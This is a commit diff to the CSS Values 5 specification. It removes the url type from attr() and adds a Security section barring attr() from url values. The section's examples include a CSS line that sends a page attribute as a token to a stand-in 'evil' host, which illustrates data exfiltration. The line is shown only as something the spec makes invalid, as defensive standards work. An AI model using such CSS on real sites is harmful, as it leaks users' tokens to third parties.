[css-values-5] Remove the url type from attr(), add security section preventing attr() from being used in urls at all. w3c#5092

tabatkins · tabatkins · commit 67112b0db843 · 2024-04-12T14:31:56.000-07:00
diff --git a/css-values-5/Overview.bs b/css-values-5/Overview.bs
@@ -899,7 +899,7 @@ Ian's proposal:
 
 		<dfn>&lt;attr-name></dfn> = [ <<ident-token>> '|' ]? <<ident-token>>
 
-		<dfn>&lt;attr-type></dfn> = string | url | ident | color | number | percentage |
+		<dfn>&lt;attr-type></dfn> = string | ident | color | number | percentage |
 		              length | angle | time | frequency | flex | <<dimension-unit>>
 	</pre>
 
@@ -983,16 +983,6 @@ Ian's proposal:
 
 			No value triggers fallback.
 
-		: <dfn>url</dfn>
-		:: The [=substitution value=] is a CSS <<url>> value,
-			whose url is the literal value of the attribute.
-			(No CSS parsing or "cleanup" of the value is performed.)
-
-			Note: If ''url()'' was syntactically capable of containing functions,
-			''attr(foo url)'' would be identical to ''url(attr(foo string))''.
-
-			No value triggers fallback.
-
 		: <dfn>ident</dfn>
 		:: The [=substitution value=] is a CSS <<custom-ident>>,
 			whose value is the literal value of the attribute,
@@ -1122,6 +1112,55 @@ Ian's proposal:
 	3. Otherwise, the property containing the ''attr()'' function
 		is [=invalid at computed-value time=].
 
+
+<h4 id=attr-security>
+Security</h4>
+
+	An ''attr()'' function can reference attributes
+	that were never intended by the page to be used for styling,
+	and might contain sensitive information
+	(for example, a security token used by scripts on the page).
+
+	In general, this is fine.
+	It is difficult to use ''attr()'' to extract information from a page
+	and send it to a hostile party,
+	in most circumstances.
+	The exception to this is URLs.
+	If a URL can be constructed with the value of an arbitrary attribute,
+	purely from CSS,
+	it can easily send any information stored in attributes
+	to a hostile party,
+	if 3rd-party CSS is allowed at all.
+
+	For this reason,
+	''attr()'' does not have a <css>url</css> type.
+	Additionally, ''attr()'' is not allowed to be used
+	in any <<url>> value,
+	whether directly or indirectly.
+	Doing so makes the property it's used in invalid.
+
+	<div class=example>
+		For example,
+		all of the following are invalid:
+
+		* ''background-image: src(attr(foo));'' - can't use it directly.
+		* ''background-image: image(attr(foo))'' - can't use it in other <<url>>-taking functions.
+		* ''background-image: src(string("http://example.com/evil?token=" attr(foo)))'' - can't "launder" it thru another function.
+		* ''--foo: attr(foo); background-image(src(var(--foo)))'' (assuming that ''--foo'' is a [=registered custom property=] with string syntax) - can't launder the value thru another property, either.
+	</div>
+
+	Note: Implementing this restriction
+	requires tracking a dirty bit
+	on values constructed from ''attr()'' values,
+	since they can be fully resolved into a string
+	via [=registered custom properties=],
+	so you can't rely on just examining the value expression.
+	Note that non-string types can even trigger this,
+	via functions like <css>string()</css>
+	that can stringify other types of values:
+	''--foo: attr(foo number); background-image: src(string(var(--foo)))''
+	needs to be invalid as well.
+
 <!-- Big Text: random
 
 ████▌   ███▌  █    █▌ ████▌   ███▌  █     █
